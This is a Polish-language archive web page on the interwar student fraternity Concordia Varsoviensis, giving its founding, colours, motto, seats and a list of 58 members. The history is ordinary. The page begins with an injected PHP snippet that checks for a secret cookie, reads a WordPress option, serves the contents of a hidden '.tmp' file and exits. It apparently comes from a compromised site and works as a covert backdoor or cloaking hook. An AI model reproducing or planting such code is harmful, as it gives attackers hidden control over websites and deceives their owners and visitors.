if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Concordia Varsoviensis

Dekiel Concordii Vilnensis - vide Poszukiwania. Nazwa:
Polska Korporacja Akademicka “Concordia Varsoviensis”
Siedziba:
Warszawa
Data powstania:
6 XI 1921 r.
Barwy:
błękitna – srebrna – granatowa
Dewiza:
„Concordia res parvae crescunt, discordia maxime dilabuntur” („W zgodzie małe rzeczy rosną, w niezgodzie nawet największe upadają”)

Rys historyczny

Listownik Concordii, 1931 r.

Concordia została założona dnia 6 XI 1921 r. przez grupę studentów Wolnej Wszechnicy Polskiej. Początkowo była korporacją ściśle związaną z Wolną Wszechnicą i grupującą wyłącznie słuchaczy tej uczelni. Od 1926 r. stała się organizacją międzyuczelnianą. Szczególnym celem korporacji była praca na rzecz marynistyki, a wszyscy członkowie korporacji należeli do Koła Marynistów przy Lidze Morskiej i Rzecznej.

Pieczęć Concordii Varsoviensis, 1931 r.

Od dnia 17 XI 1921 r. należała do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 17 XI 1921 r.). Kandydowała pod opieką K! Arkonia. Prawa członka rzeczywistego uzyskała w listopadzie 1925 r. Od 1923 r. istniało Koło Filistrów Concordii. W konsekwencji “reform” jędrzejewiczowskich korporacja po 1933 r. zanikła.

Siedziby korporacji mieściły się: w roku akademickim 1925/26 przy ul. Nowy Świat 22/31, w latach 1927-1929 przy ul. Śniadeckich 8 (Wolna Wszechnica Polska), a w latach 1929-33 przy ul. Smolnej 12.

Całkowita ustalona, niekompletna imienna lista członków obejmuje 58 nazwisk.

Brak wiadomości o powojennej działalności Concordii i spotkaniach jej członków.

Lista członków

Poniższa, niekompletna lista członków Concordii obejmuje około 60 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

 1. Jan Ambrozik, student WWP, c. 1925/26, akt. 1925/26-33, sekretarz sem. let. 1928/29
 2. Cezary Bajkowski, student WWP, c. 1928/29, akt. 1928/29-30
 3. Eugeniusz Bartold, akt. 1924-25
 4. Janusz Borowski, c. 1924/25, akt. 1924/25
 5. Lech Bukalski, student WSH, c. 1930/31, akt. 1930/31-33, wiceprezes sem. zim. 1931/32
 6. Kazimierz Chreszczeński, student WWP, akt. 1924-31, II wiceprezes sem. let. 1925/26, wiceprezes sem. let. 1928/29, wiceprezes WKM-u sem. zim. 1928/29
 7. Eugeniusz Czajkowski, student WWP, c. 1925/26, akt. 1925/26-33, sekretarz sem. let. 1927/28
 8. Al. Depczyk,
 9. St. Depczyk,
 10. Józef Domagalski, c. 1924/25, akt. 1924/25-6
 11. Henryk Domański, student WWP, c. 1928/29, akt. 1928/29-33
 12. Ryszard Donten, akt. 1924-25
 13. Juljusz Jerzy Drac, student WWP, c. 1928/29, akt. 1928/29-33, sekretarz sem. zim. 1930/31, prezes sem. zim. 1931/32, olderman sem. zim. 1932/33
 14. Józef Garnczarczyk, student WWP, c. 1928/29, akt. 1928/29
 15. Mirosław Gajewski, student UW, c. 1931/32, akt. 1931/32-33
 16. Władysław Gajewski, student PW, c. 1927/28, akt. 1927/28-33
 17. Witold Górnisiewicz, student WWP, akt. 1924-33
 18. Jan Gulczyński, student UW, c. 1931/32, akt. 1931/32, sekretarz sem. zim. 1932/33
 19. Jan Jedliński, c. 1924/25, akt. 1924/25
 20. Stefan Jeżycki, student WWP, akt. 1924-29
 21. Marian Kluczyński, c. 1924/25, akt. 1924/25
 22. Aleksander Kłębukowski, student UW, c. 1929/30, akt. 1929/30-33, sekretarz sem. zim. 1931/32, prezes sem. zim. 1932/33
 23. Jerzy Koperski, student WWP, c. 1925/26, akt. 1925/26-33, olderman sem. let. 1928/29, olderman sem. let. 1929/30
 24. Max Koprowski, student UW, c. 1932/33, akt. 1932/33
 25. Janusz Korycki, akt. 1924-26
 26. Wacław Kwaśnicki, student WSH, c. 1931/32, akt. 1931/32-33
 27. Wojciech Lewandowski, akt. 1924-25
 28. Brunon Luniak, student WWP, akt. 1924-30, wiceprezes sem. let. 1924/25, prezes sem. let. 1928/29, olderman sem. zim. 1930/31 i sem. zim. 1931/32, prezes WKM-u sem. zim. 1928/29
 29. Stefan Łapiński, student SNP, akt. 1924-33
 30. Zygmunt Maciaszek, student WWP, akt. 1924-29, sekretarz sem. zim. oraz sem. let. 1924/25, prezes sem. let. 1925/26
 31. Wiktor Marciniak, student WWP, c. 1924/25, akt. 1924/25-29
 32. Jan Mioduszewski, student WSH, c. 1929/30, akt. 1929/30-33
 33. Eugeniusz Modzelewski, student WWP, akt. 1924-31, sekretarz sem. let. 1925/26
 34. Bolesław Mosiewicz, student WWP, akt. 1924-29, prezes sem. zim. 1924/25, olderman sem. let. 1925/26
 35. Stanisław Nawrocki, akt. 1924-25
 36. Włodzimierz Otocki, c. 1924/25, akt. 1924-28
 37. Józef Owczarek, student WSH, c. 1932/33, akt. 1932/33
 38. Mieczysław Porajski, student WWP, akt. 1924-31, olderman sem. let. 1927/28
 39. Michał Reszke, student WWP, akt. 1924-29, wiceprezes sem. zim. 1924/25
 40. Leon Romanowski, student WWP, akt. 1924-31, prezes sem. let. 1927/28
 41. Aleksander Rutkowski, student WWP, c. 1927/28, akt. 1927/28-32
 42. Wiktor Rybacki, c. 1925/26, akt. 1925/26
 43. Stanisław Rybak, student WSH, c. 1931/32, akt. 1931/32-33, fuksmajor sem. let. 1932/33
 44. Józef Sadlo, akt. 1924-26
 45. Jerzy Sobol, c. 1924/25, akt. 1924/25
 46. Seweryn Smólski, akt. 1924-26
 47. Stanisław Szybiński, student UW, c. 1927/28, akt. 1927/28
 48. Włodzimierz Szyller, student UW, c. 1925/26, akt. 1925/26-33, I wiceprezes sem. let. 1927/28, prezes sem. let. 1929/30
 49. Jan Śliwiński, student WWP, c. 1928/29, akt. 1928/29-30
 50. Józef Warmus, student WWP, c. 1925/26, akt. 1925/26-32
 51. Aleksander Wieliczko, c. 1924/25, akt. 1924/25
 52. Zygmunt Konrad Wyrzykowski, student WWP, c. 1924/25, akt. 1924/25-33, II wiceprezes sem. let. 1927/28, sekretarz sem. let. 1928/29, sekretarz sem. let. 1929/30, prezes sem. zim. 1930/31, sekretarz WKM-u sem. zim. 1928/29
 53. Jan Zaczek, student WSH, c. 1930/31, akt. 1930/31
 54. Tadeusz Zawadzki, student WWP, akt. 1924-32, olderman sem. zim. 1924/25, wiceprezes sem. let. 1928/29, wiceprezes sem. let. 1929/30, skarbnik WKM-u sem. zim. 1928/29
 55. Apolinary Zuń, student WWP, akt. 1924-32, I wiceprezes sem. let. 1925/26
 56. Andrzej Żienkiewicz, student UW, c. 1930/31, akt. 1930/31
 57. Józef Franciszek Zientarski, student WWP, c. 1932/33, akt. 1932/33
 58. Feliks Żmurek, student WSH, c. 1928/29, akt. 1928/29-33, wiceprezes sem. zim. 1930/31, wiceprezes sem. zim. 1932/33

Listę członków opracowano na podstawie:

1) biuletynów Warszawskiego Koła Międzykorporacyjnego z lat 1924-1933,
2) materiałów archiwalnych z Archiwum Korporacyjnego,
3) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Concordia Varsoviensis.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 2 IX 2010 r.
Ostatnia zmiana: 6 XII 2010 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Polska Korporacja Akademicka “Concordia Varsoviensis”, (na:) www.archiwumkorporacyjne.pl, stan 6 XII 2010 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }